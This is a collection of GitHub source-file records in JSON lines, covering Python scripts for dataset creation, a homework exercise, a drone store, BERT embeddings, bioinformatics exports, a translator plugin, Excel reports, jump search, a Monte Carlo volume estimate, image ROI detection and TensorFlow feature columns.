5,\n \"ba\": 6,\n \"qy\": 7,\n \"x\": 8,\n \"ny\": 9,\n \"fc\": 10,\n \"%\": 11,\n \"qw\": 12,\n \"nn\": 13,\n \"bk\": 14,\n \"h\": 15,\n \"qy^d\": 16,\n \"o\": 17,\n \"bh\": 18,\n \"^q\": 19,\n \"bf\": 20,\n \"na\": 21,\n \"ny^e\": 22,\n \"ad\": 23,\n \"^2\": 24,\n \"b^m\": 25,\n \"qo\": 26,\n \"qh\": 27,\n \"^h\": 28,\n \"ar\": 29,\n \"ng\": 30,\n \"nn^e\": 31,\n \"br\": 32,\n \"no\": 33,\n \"fp\": 34,\n \"qrr\": 35,\n \"arp\": 36,\n \"nd\": 37,\n \"t3\": 38,\n \"oo\": 39,\n \"co\": 40,\n \"cc\": 41,\n \"t1\": 42,\n \"bd\": 43,\n \"aap\": 44,\n \"am\": 45,\n \"^g\": 46,\n \"qw^d\": 47,\n \"fa\": 48,\n \"ft\":49 \n })\n d = defaultdict(lambda: 11)\n for (k, v) in mapping_dict.items():\n d[k] = v\n return d\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UKPLab/acl2020-dialogue-coherence-assessment","sub_path":"create_coherency_dataset.py","file_name":"create_coherency_dataset.py","file_ext":"py","file_size_in_byte":25426,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"42488267136","text":"# ## Задача 1. Генерация списка\n# Дано целое число N. Напишите программу, которая\n# формирует список из нечетных чисел от 1 до N.\n#\n# Пример 1\n# ```\n# Введите число: 1\n#\n# Список из нечётных чисел от 1 до N: [1]\n# ```\n#\n# Пример 2\n# ```\n# Введите число: 14\n#\n# Список из нечётных чисел от 1 до N: [1, 3, 5, 7, 9, 11, 13]\n# ```\n\nn = int(input('Введите целое число N: '))\nn_list = []\n\nfor i in range(1, n + 1, 2):\n n_list.append(i)\n\nprint('Список из нечётных чисел от 1 до N:', n_list)\n\n","repo_name":"vyacheslav-79109734555/15_Basic-collections-Indexes-list-items","sub_path":"_Домашнее задание/task_01_list_gen/1_Генерация списка.py","file_name":"1_Генерация списка.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4526395337","text":"import logging\nimport json\nimport os.path\n\n\nclass DroneStore():\n\n def __init__(self):\n self.__devices = None\n self.__filename = 'drones.json'\n self.__init_store()\n\n def add(self, mac):\n\n self.__devices.append(mac)\n self.__write()\n\n def remove(self, mac):\n self.__devices = [d for d in self.__devices if d != mac]\n self.__write()\n\n def get(self, drone_id=0):\n\n if drone_id == 0:\n return self.__devices[1:]\n elif drone_id < len(self.__devices):\n return self.__devices[drone_id]\n else:\n return -1\n\n def count(self):\n if self.__devices is None:\n return 0\n else:\n return len(self.__devices) - 1\n\n def __write(self):\n data = {\n 'drones': self.__devices\n }\n with open(self.__filename, \"w\") as write_file:\n json.dump(data, write_file)\n\n def __init_store(self):\n if not os.path.isfile(self.__filename):\n logging.info('Store %s not found -> creating' % self.__filename)\n self.__devices = ['']\n with open(self.__filename, \"w\") as write_file:\n json.dump({'drones': self.__devices}, write_file)\n else:\n logging.info(\"Loading drones store from %s\" % self.__filename)\n self.__devices = []\n with open(self.__filename, \"r\") as read_file:\n data = json.load(read_file)\n for mac in data['drones']:\n self.__devices.append(mac)\n","repo_name":"jonasauda/flyables","sub_path":"dronecontrol/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"74252443469","text":"'''\nA wrapper for interacting with bert-as-service (https://github.com/hanxiao/bert-as-service)\n'''\n\n\nimport os.path\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\n\nFILE = './embeddings.db'\n\nif os.path.isfile(FILE):\n embeddings_on_disk = pickle.load(open(FILE, 'rb'))\nelse:\n embeddings_on_disk = {}\n\nbert_client = BertClient()\n\ndef bert_sent_embeddings(sents, batch_size=250, persist=True):\n size_before = len(embeddings_on_disk)\n\n chunks = max(1, int(len(sents) / batch_size))\n splits = np.array_split(sents, chunks)\n\n return_list = []\n for split in splits:\n return_list += _bert_sent_embeddings(split.tolist())\n\n # only print if we're doing batch\n if len(sents) > 1:\n print(\"Processed:\", len(return_list), \"of\", len(sents))\n\n size_after = len(embeddings_on_disk)\n\n if persist and size_after > size_before:\n save()\n\n return return_list\n\n\ndef _bert_sent_embeddings(sents):\n todo_sents = [s for s in sents if s not in embeddings_on_disk]\n\n if len(todo_sents) > 0:\n retrieved_embeddings = bert_client.encode(todo_sents, is_tokenized=False)\n\n assert(len(retrieved_embeddings) == len(todo_sents))\n\n\n for sent, vec in zip(todo_sents, retrieved_embeddings):\n embeddings_on_disk[sent] = vec\n\n return [embeddings_on_disk[s] for s in sents]\n\ndef save():\n pickle.dump(embeddings_on_disk, open('./embeddings.db', 'wb+'))\n\n\n","repo_name":"OHNLP/clinical-problem-standardization","sub_path":"embedding/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"3895713902","text":"from itertools import accumulate\r\nimport operator\r\n\r\nnums = range(1, 101)\r\n\r\n# The results from 1 to 100 cumulatively added\r\nresults_added = accumulate(nums, operator.add)\r\nprint(results_added)\r\n\r\nfor item in results_added:\r\n print(item)\r\n\r\n# The results from 1 to 100 cumulatively subtracted\r\nresults_subtracted= accumulate(nums, operator.sub)\r\nprint(results_subtracted)\r\n\r\nfor item in results_subtracted:\r\n print(item)\r\n","repo_name":"sourcery-ai-bot/library-python","sub_path":"standard_library/mod_itertools/accumulate.py","file_name":"accumulate.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40583442995","text":"# -*- coding: utf-8 -*-\n# __author__ = 'shicaiping'\nfrom __future__ import division\nimport os\nfrom biocluster.config import Config\nfrom bson.objectid import ObjectId\nimport types\nimport json\nimport re\nfrom types import StringTypes\nimport gridfs\nfrom collections import OrderedDict\nimport pandas as pd\nimport unicodedata\nfrom biocluster.file import getsize, exists\nfrom biocluster.file import download\n\nproject_type = 'denovo_rna_v2'\ndb = Config().get_mongo_client(mtype=project_type)[Config().get_mongo_dbname(project_type)]\n\ndef export_upset_venn(data, option_name, dir_path, bind_obj=None):\n gene_list_path = os.path.join(dir_path, \"upset_venn.txt\")\n bind_obj.logger.debug(\"正在导出基因集\")\n collection = db['sg_geneset_detail']\n main_collection = db['sg_geneset']\n geneset_id_list = data.split(',')\n gene_list_all = list()\n gene_name_seq = dict()\n for i in geneset_id_list:\n my_result = main_collection.find_one({'main_id': ObjectId(i)})\n if not my_result:\n bind_obj.set_error(\"意外错误,geneset_id:{}在sg_geneset中未找到!\".format(ObjectId(i)))\n geneset_name = my_result['name']\n results = collection.find_one({\"geneset_id\": ObjectId(i)})\n gene_list = results['seq_list']\n gene_name_seq[geneset_name] = gene_list\n gene_list_all.extend(gene_list)\n df = pd.DataFrame.from_dict(gene_name_seq, orient='index').T\n df.to_csv(gene_list_path, header=True, index=False, sep='\\t')\n # with open(gene_list_path, 'w') as f:\n # a = gene_name_seq.keys()\n # b = '\\t'.join(a)\n # f.write(b + '\\n')\n # for i in gene_list_all:\n # num_list = list()\n # for j in a:\n # if i in gene_name_seq[j]:\n # num_list.append(str(1))\n # else:\n # num_list.append(\"\")\n # f.write('\\t'.join(num_list) + '\\n')\n return gene_list_path\n\ndef export_diff_plot(data, option_name, dir_path, bind_obj=None):\n '''\n 导出差异分析gene_id,log2FC,pvalue\n '''\n diff_id = bind_obj.sheet.option('diff_id')\n compare_group = bind_obj.sheet.option('compare')\n target_cols = OrderedDict(seq_id=1, log2fc=1, pvalue=1, _id=0)\n bind_obj.logger.debug(\"导出表达参数 {}\".format(target_cols))\n conn = db['sg_diff_detail']\n diff_exp_records = conn.find({\"diff_id\": ObjectId(diff_id), \"compare\": compare_group}, target_cols)\n diff_exp_matrix = pd.DataFrame(list(diff_exp_records))\n columnc_order = ['seq_id', 'log2fc', 'pvalue']\n diff_exp_matrix = diff_exp_matrix[columnc_order].dropna(axis=0)\n output = os.path.join(dir_path, 'diff_plot.txt')\n diff_exp_matrix.to_csv(output, sep='\\t', header=True, index=False)\n print('success to export diffexpression matrix')\n return output\n\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/api/to_file/denovo_rna_tool.py","file_name":"denovo_rna_tool.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"14958911962","text":"import hashlib\nimport http.client\nimport json\nimport re\nimport urllib.parse\nimport urllib.request\n\n# import requests\nfrom catapult.api import (Plugin, SearchResult, copy_text_to_clipboard,\n lookup_icon)\nfrom catapult.i18n import _\n\ncache = {}\n\nPATTERN = re.compile(r\"^tr\\s([a-z]{2})\\s([a-z]{2})\\s(.*)\\s\")\n\n\nclass TranslatorPlugin(Plugin):\n save_history = False\n title = _(\"Translator\")\n cache_key = \"\"\n\n def __init__(self):\n super().__init__()\n self.endpoint = \"/translate_a/single\"\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"https://translate.google.com/\",\n \"Origin\": \"https://translate.google.com\",\n }\n self.url = \"translate.googleapis.com\"\n self.conn = http.client.HTTPSConnection(self.url)\n self.num_conn = 0\n\n def google_translate(self, text, source_language, target_language):\n self.cache_key = hashlib.md5(\n f\"{text}{source_language}{target_language}\".encode()\n ).hexdigest()\n if self.cache_key in cache:\n return cache[self.cache_key]\n\n params = {\n \"client\": \"gtx\",\n \"sl\": source_language,\n \"tl\": target_language,\n \"dt\": \"t\",\n \"q\": text,\n }\n\n data = urllib.parse.urlencode(params).encode(\"utf-8\")\n\n self.conn.request(\"POST\", self.endpoint, data, self.headers)\n\n response = self.conn.getresponse()\n\n result_text = response.read().decode()\n\n # self.conn.close()\n\n try:\n result = json.loads(result_text)\n result_text = result[0][0][0]\n except (json.JSONDecodeError, IndexError):\n result_text = \"\"\n\n cache[self.cache_key] = result_text\n self.num_conn += 1\n if self.num_conn == 10:\n self.conn.close()\n self.conn = http.client.HTTPSConnection(self.url)\n self.num_conn += 1\n return result_text\n\n def launch(self, window, id):\n copy_text_to_clipboard(cache.get(self.cache_key, \"\"))\n\n def search(self, query):\n match = re.match(PATTERN, query)\n if not match:\n return\n\n src, dest, text = match.groups()\n result = self.google_translate(text, src, dest)\n if result:\n yield SearchResult(\n description=result,\n fuzzy=False,\n icon=lookup_icon(\n \"gnome-translate\",\n \"deepin-translator\",\n \"org.gnome.Translate\",\n \"org.gnome.Translate\",\n \"application-x-executable\",\n ),\n id=\"0\",\n offset=0,\n plugin=self,\n score=1,\n title=\"Traduccion\",\n )\n\n\n# def google_translate(self, text, source_language, target_language):\n# cache_key = hashlib.md5(\n# f\"{text}{source_language}{target_language}\".encode()\n# ).hexdigest()\n# if cache_key in cache:\n# return cache[cache_key]\n#\n# url = \"https://translate.googleapis.com/translate_a/single\"\n# params = {\n# \"client\": \"gtx\",\n# \"sl\": source_language,\n# \"tl\": target_language,\n# \"dt\": \"t\",\n# \"q\": text,\n# }\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\n# }\n# try:\n# response = requests.get(\n# url, params=params, headers=headers, timeout=3\n# ).json()\n# result = response[0][0][0]\n# cache[cache_key] = result\n# except:\n# result = None\n# return result\n#\n# def search(self, query):\n# match = re.match(PATTERN, query)\n# if not match:\n# return\n#\n# src, dest, text = match.groups()\n# result = self.google_translate(text, src, dest)\n#\n# if result:\n# yield SearchResult(\n# description=result,\n# fuzzy=False,\n# icon=lookup_icon(\n# \"gnome-translate\",\n# \"deepin-translator\",\n# \"org.gnome.Translate\",\n# \"org.gnome.Translate\",\n# \"application-x-executable\",\n# ),\n# id=result,\n# offset=0,\n# plugin=self,\n# score=1,\n# title=\"Traduccion\",\n# )\n\n# def google_translate(self, text, source_language, target_language):\n# base_url = \"https://translate.googleapis.com/translate_a/single?client=gtx&sl={0}&tl={1}&dt=t&q={2}\"\n# url = base_url.format(\n# source_language, target_language, urllib.parse.quote(text)\n# )\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\n# }\n# req = urllib.request.Request(url, headers=headers)\n# response = urllib.request.urlopen(req).read().decode(\"utf-8\")\n# result = json.loads(response)[0][0][0]\n# return result\n#\n# def search(self, query):\n# match = re.match(PATTERN, query)\n# if not match:\n# return\n#\n# src, dest, text = match.groups()\n# result = self.google_translate(text, src, dest)\n#\n# if result:\n# yield SearchResult(\n# description=result,\n# fuzzy=False,\n# icon=lookup_icon(\n# \"gnome-translate\",\n# \"deepin-translator\",\n# \"org.gnome.Translate\",\n# \"org.gnome.Translate\",\n# \"application-x-executable\",\n# ),\n# id=result,\n# offset=0,\n# plugin=self,\n# score=1,\n# title=\"Traduccion\",\n# )\n","repo_name":"CRAG666/dotfiles","sub_path":"local/share/catapult/plugins/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"82"} +{"seq_id":"42124616794","text":"# -*- coding: utf-8 -*-\n\n################################################################################################\n# Plataforma para la Iniciativa Regional de Monitoreo Hidrológico de Ecosistemas Andinos (iMHEA)\n# basada en los desarrollos realizados por:\n# 1) FONDO PARA LA PROTECCIÓN DEL AGUA (FONAG), Ecuador.\n# Contacto: info@fonag.org.ec\n# 2) EMPRESA PÚBLICA METROPOLITANA DE AGUA POTABLE Y SANEAMIENTO DE QUITO (EPMAPS), Ecuador.\n# Contacto: paramh2o@aguaquito.gob.ec\n#\n# IMPORTANTE: Mantener o incluir esta cabecera con la mención de las instituciones creadoras,\n# ya sea en uso total o parcial del código.\n\nfrom django.db.models import Avg\n\n# librerias para manejar los archivos EXCEL\nfrom openpyxl.styles import Alignment, Border, Font, PatternFill, Side\n\nfrom anuarios.models import (\n Var1Anuarios,\n Var2Anuarios,\n Var3Anuarios,\n Var6Anuarios,\n Var8Anuarios,\n Var9Anuarios,\n Var10Anuarios,\n Var11Anuarios,\n)\nfrom validacion_v2.functions import normalize\nfrom variable.models import Variable\n\n\nclass Titulos:\n # Estilo de Fuentes\n fonts = {\n \"font_bold_11\": Font(bold=True),\n \"font_bold_10\": Font(bold=True, size=10),\n \"font_10\": Font(size=10),\n \"font_11\": Font(size=11),\n \"font_8\": Font(size=8),\n }\n # Alineacion de las celdas\n alignments = {\n \"center\": Alignment(horizontal=\"center\", vertical=\"center\"),\n \"right\": Alignment(horizontal=\"right\", vertical=\"center\"),\n \"left\": Alignment(horizontal=\"left\", vertical=\"center\"),\n \"wrap\": Alignment(horizontal=\"center\", vertical=\"center\", wrap_text=True),\n }\n thin = Side(border_style=\"thin\", color=\"000000\")\n medium = Side(border_style=\"medium\", color=\"000000\")\n # bordes\n borders = {\n \"border_thin\": Border(top=thin, left=thin, bottom=thin, right=thin),\n \"border_medium\": Border(top=medium, left=medium, right=medium, bottom=medium),\n }\n # relleno\n colors = {\n \"orange\": PatternFill(\"solid\", fgColor=\"FDE9D9\"),\n \"light_salmon\": PatternFill(\"solid\", fgColor=\"FFA07A\"),\n }\n\n @staticmethod\n def titulo_grafico(variable):\n # returns var_nombre given var_id\n consulta = list(Variable.objects.filter(var_id=variable))\n\n return consulta[0]\n\n @staticmethod\n def titulo_unidad(variable):\n var = Variable.objects.get(var_id=variable)\n return var.uni_id.uni_sigla\n\n @staticmethod\n def consulta(estacion, variable, periodo):\n if variable.var_id == 1:\n informacion = list(\n Var1Anuarios.objects.filter(est_id=estacion).filter(pre_periodo=periodo)\n )\n elif variable.var_id == 2:\n informacion = list(\n Var2Anuarios.objects.filter(est_id=estacion).filter(tai_periodo=periodo)\n )\n elif variable.var_id == 3:\n informacion = list(\n Var3Anuarios.objects.filter(est_id=estacion).filter(hai_periodo=periodo)\n )\n elif variable.var_id == 6:\n informacion = list(\n Var6Anuarios.objects.filter(est_id=estacion).filter(hsu_periodo=periodo)\n )\n elif variable.var_id == 8:\n informacion = list(\n Var8Anuarios.objects.filter(est_id=estacion).filter(pat_periodo=periodo)\n )\n elif variable.var_id == 9:\n informacion = list(\n Var9Anuarios.objects.filter(est_id=estacion).filter(tag_periodo=periodo)\n )\n elif variable.var_id == 10:\n informacion = list(\n Var10Anuarios.objects.filter(est_id=estacion).filter(\n cau_periodo=periodo\n )\n )\n elif variable.var_id == 11:\n informacion = list(\n Var11Anuarios.objects.filter(est_id=estacion).filter(\n nag_periodo=periodo\n )\n )\n return informacion\n\n @staticmethod\n def datos_historicos(estacion, variable, periodo):\n modelo = \"Var\" + str(variable.var_id) + \"Anuarios\"\n modelo = globals()[modelo]\n consulta = modelo.objects.filter(est_id=estacion)\n mes = str(variable.var_codigo).lower() + \"_mes\"\n promedio = str(variable.var_codigo).lower() + \"_promedio\"\n if variable.var_id == 2:\n consulta = consulta.exclude(tai_periodo=periodo).values(mes)\n elif variable.var_id == 3:\n consulta = consulta.exclude(hai_periodo=periodo).values(mes)\n elif variable.var_id == 6:\n consulta = consulta.exclude(hsu_periodo=periodo).values(mes)\n elif variable.var_id == 8:\n consulta = consulta.exclude(pat_periodo=periodo).values(mes)\n elif variable.var_id == 9:\n consulta = consulta.exclude(tag_periodo=periodo).values(mes)\n elif variable.var_id == 10:\n consulta = consulta.exclude(cau_periodo=periodo).values(mes)\n elif variable.var_id == 11:\n consulta = consulta.exclude(nag_periodo=periodo).values(mes)\n\n informacion = list(consulta.annotate(valor=Avg(promedio)).order_by(mes))\n\n datos = []\n for item in informacion:\n datos.append(item[\"valor\"])\n return datos\n\n def set_encabezado_excel(self, ws, estacion, periodo):\n fila = 1\n col = 1\n col_fin = 11\n\n ws.merge_cells(\n start_row=fila, start_column=col, end_row=fila, end_column=col + 2\n )\n title = ws.cell(row=fila, column=col)\n title.value = estacion.est_codigo\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 3, end_row=fila, end_column=col + 7\n )\n title = ws.cell(row=fila, column=col + 3)\n title.value = estacion.est_nombre\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 8, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col + 8)\n title.value = periodo\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n fila += 1\n\n ws.merge_cells(\n start_row=fila, start_column=col, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col)\n title.value = \"Coordenadas Geográficas\"\n self.set_style(\n cell=title, font=\"font_bold_11\", alignment=\"center\", border=\"border_thin\"\n )\n\n fila += 1\n\n cell = ws.cell(row=fila, column=col)\n cell.value = \"Latitud\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 1, end_row=fila, end_column=col + 3\n )\n title = ws.cell(row=fila, column=col + 1)\n title.value = estacion.est_latitud\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n cell = ws.cell(row=fila, column=col + 4)\n cell.value = \"Longitud\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 5, end_row=fila, end_column=col + 7\n )\n title = ws.cell(row=fila, column=col + 5)\n title.value = estacion.est_longitud\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n cell = ws.cell(row=fila, column=col + 8)\n cell.value = \"Altura\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 9, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col + 9)\n title.value = estacion.est_altura\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n def bordes_celdas(self, ws, start_row, start_column, end_row, end_column):\n for fil in range(start_row, end_row + 1):\n for col in range(start_column, end_column + 1):\n cell = ws.cell(row=fil, column=col)\n self.set_style(cell=cell, border=\"border_thin\")\n\n @staticmethod\n def get_mes_anio(int_mes):\n # meses = ['Enero', 'Febrero','Marzo', 'Abril', 'Mayo', 'Junio', 'Julio','Agosto',\n # 'Septiembre','Octubre','Noviembre','Diciembre']\n meses = [\n \"ENE\",\n \"FEB\",\n \"MAR\",\n \"ABR\",\n \"MAY\",\n \"JUN\",\n \"JUL\",\n \"AGO\",\n \"SEP\",\n \"OCT\",\n \"NOV\",\n \"DIC\",\n \"ANUAL\",\n ]\n\n return meses[int_mes - 1]\n\n def set_style(self, cell, font=None, alignment=None, border=None, fill=None):\n if font is not None:\n cell.font = self.fonts[font]\n if alignment is not None:\n cell.alignment = self.alignments[alignment]\n if border is not None:\n cell.border = self.borders[border]\n if fill is not None:\n cell.fill = self.colors[fill]\n","repo_name":"ImperialCollegeLondon/paricia","sub_path":"unused_apps/reportes_v2/titulos.py","file_name":"titulos.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73859796107","text":"import math\nkey=346\nl=[2,3,5,7,8,34,78,99,346,567,568,678,876,984,999]\ns=len(l)\njp=math.sqrt(s)\nval= math.ceil(jp)\nfor i in range(0,s,val):\n if l[i]==key:\n print(i)\n break\n elif l[i]>key:\n p=i-val*2\n# print(p)\nfor w in range(p,s):\n if l[w]==key:\n print(w)\n \n","repo_name":"Faizan10933/musical-octo-chainsaw","sub_path":"jumpsearch_by_me.py","file_name":"jumpsearch_by_me.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71895683787","text":"# Programming Assignment 1, Circle \"Volume\"\n# Ethan Kupka\n# Sept 27th, 2019\n\nimport random\nimport math\n\ndart = int(input(\"How many darts are you throwing?\"))\nnumdarts = dart\ninsideCount = 0\n\nfor i in range(numdarts):\n randx = 2 * random.random() - 1\n randy = 2 * random.random() - 1\n randz = 2 * random.random() - 1\n x = randx\n y = randy\n z = randz\n freddistance = x**2 + y**2 + z**2\n #for statement\n\n if freddistance <= 1:\n insideCount = insideCount + 1\n #if statement\n\narea = (insideCount / numdarts) * 8\nprint(\"Volume of the 3D Sphere is:\", area)\nrvolume = (4/3) * math.pi\nprint(\"This is the actual volume is\", rvolume)\n\n#Dimension Names: S3D) S2 R3\n#EVS: V = (4/3)*pi*r^3\n#Equation: X^2 + y^2 + z^2 < 1\n#Program intentions: Estimating the volume in the sphere\n#Monte Carlo Method, pi is not given.\n\n# Result 1) Darts(1000)Volume of the 3D Sphere is: 3.968 - This is the actual volume is 4.1887902047863905\n# The estimated and the correct answer aren't very close, they are around .2 off\n\n# Result 2) Darts(1000000)Volume of the 3D Sphere is: 4.184368 - This is the actual volume is 4.1887902047863905\n# The estimated and the correct answer very close, they become none symmetric by the third decimal spot. The more darts thrown improved the comparison a lot.\n\n# Result 3) Darts(10)Volume of the 3D Sphere is: 3.2 - This is the actual volume is 4.1887902047863905\n# The estimated and the correct answer aren't close, it's .9 off.\n","repo_name":"Ekupka1/Python-Code","sub_path":"EstOfVolume.py","file_name":"EstOfVolume.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72904242509","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport cv2 as cv\nfrom skimage.segmentation import felzenszwalb\nfrom skimage.measure import regionprops\nfrom random import randint\nborderType = cv.BORDER_REPLICATE\n\ncolors = ['red', 'green']\n\nanimals_names = ['deer', 'wild_boar']\n\n\ndef mark_regions(img, segments, animals=None, reference_bbox=None):\n fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(6, 6))\n ax.imshow(img)\n i = 0 \n for region in regionprops(segments):\n minr, minc, maxr, maxc = region.bbox\n if check_roi_cond(region, img) is True:\n if animals[i] == 0:\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n fill=False, edgecolor='red', label=\"deer\", linewidth=2)\n if animals[i] == 1:\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n fill=False, edgecolor='green',label=\"wild boar\", linewidth=2)\n ax.add_patch(rect)\n i += 1\n for bbox in reference_bbox:\n minc, minr, maxc, maxr = bbox\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n fill=False, edgecolor='blue', linewidth=2)\n ax.add_patch(rect)\n ax.legend()\n plt.show()\n\n\ndef norm_roi_to_square(roi):\n roi = cv.cvtColor(roi, cv.COLOR_BGR2GRAY)\n value = [randint(0, 255)]\n if roi.shape[0] > roi.shape[1]:\n param = roi.shape[0] - roi.shape[1]\n left = int(param / 2)\n right = int(param / 2)\n norm_roi = cv.copyMakeBorder(roi, 0, 0, left, right, borderType, None, value)\n #plot_img(norm_roi)\n img_norm = cv.resize(norm_roi,(128, 128))\n #plot_img(img_norm, title=\"obiekt znormalizowany\")\n return img_norm\n elif roi.shape[0] < roi.shape[1]:\n param = roi.shape[1] - roi.shape[0]\n bottom = int(param/2)\n top = int(param/2)\n norm_roi = cv.copyMakeBorder(roi, top, bottom, 0, 0, borderType, None, value)\n #plot_img(norm_roi)\n img_norm = cv.resize(norm_roi,(128, 128))\n #plot_img(img_norm, title=\"obiekt znormalizowany\")\n return img_norm\n else:\n #plot_img(roi)\n img_norm = cv.resize(roi,(128, 128))\n #plot_img(img_norm, title=\"obiekt znormalizowany\")\n return roi\n\n\ndef check_roi_cond(region, img, small_animal=True):\n minr, minc, maxr, maxc = region.bbox\n ratio = (maxc -minc)/(maxr -minr)\n if(region.area <= 100):\n return False\n elif(abs((maxr-minr - img.shape[0])) < 10 or abs(maxc-minc - img.shape[1]) < 10):\n return False\n elif maxr - minr < 25 or maxc - minc < 25:\n return False\n elif ratio > 3 or ratio < 1/3:\n return False\n else:\n return True\n\n\ndef get_falzenszwalb_roi(img):\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n seg = felzenszwalb(gray, scale=1000, sigma=4, min_size=1)\n print(\"Felzenszwalb's number of segments: %d\" % len(np.unique(seg)))\n return seg\n\ndef get_roi(img, segments):\n roi = []\n i = 0\n seg_updated = segments\n index_to_remove = []\n for region in regionprops(segments):\n minr, minc, maxr, maxc = region.bbox\n if check_roi_cond(region, img) is True:\n cropped_image = img[minr:maxr, minc:maxc]\n #plot_img(cropped_image)\n norm_roi_to_square(cropped_image)\n roi.append(cropped_image)\n else: \n index_to_remove.append(i)\n i += 1\n seg_updated = np.delete(seg_updated, index_to_remove)\n print(f\"Reduced Number of ROI: {len(roi)}\")\n return roi\n\ndef predicted_to_file(filename, animals, segments, img, confidence=1.):\n with open('./predicted_boxes/' + filename, \"w\") as f:\n i = 0\n for region in regionprops(segments):\n minr, minc, maxr, maxc = region.bbox\n if check_roi_cond(region, img) is True:\n f.write(f\"{animals_names[animals[i]]} {confidence} {minc} {minr} {maxc} {maxr}\\n\")\n i += 1\n print(\"file saved!\")\n","repo_name":"lpopek/Automation-of-animal-detection-in-thermal-camera-image","sub_path":"HOG-SVM/find_ROI.py","file_name":"find_ROI.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6444101716","text":"from tensorflow.python.feature_column import feature_column as fc_old\nfrom tensorflow.python.feature_column import utils as fc_utils\nfrom tensorflow.python.feature_column.feature_column_v2 import (\n DenseColumn, FeatureColumn, SequenceCategoricalColumn, SequenceDenseColumn)\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import sparse_ops\nfrom tensorflow.python.util import deprecation\n\n_FEATURE_COLUMN_DEPRECATION_DATE = None\n_FEATURE_COLUMN_DEPRECATION = 'The old _FeatureColumn APIs are being deprecated. Please use the new FeatureColumn '\n\n\nclass IndicatorColumnDef(DenseColumn, SequenceDenseColumn, fc_old._DenseColumn, fc_old._SequenceDenseColumn):\n def __init__(self, categorical_column, size, *args):\n self.categorical_column = categorical_column\n self.size = size\n # super(IndicatorColumn2, self).__init__(*args)\n\n @property\n def _is_v2_column(self):\n return isinstance(self.categorical_column, FeatureColumn) and self.categorical_column._is_v2_column\n\n @property\n def name(self):\n \"\"\"See `FeatureColumn` base class.\"\"\"\n return '{}_indicator'.format(self.categorical_column.name)\n\n def _transform_id_weight_pair(self, id_weight_pair):\n id_tensor = id_weight_pair.id_tensor\n\n dense_id_tensor = sparse_ops.sparse_tensor_to_dense(\n id_tensor, default_value=-1)\n\n # One hot must be float for tf.concat reasons since all other inputs to 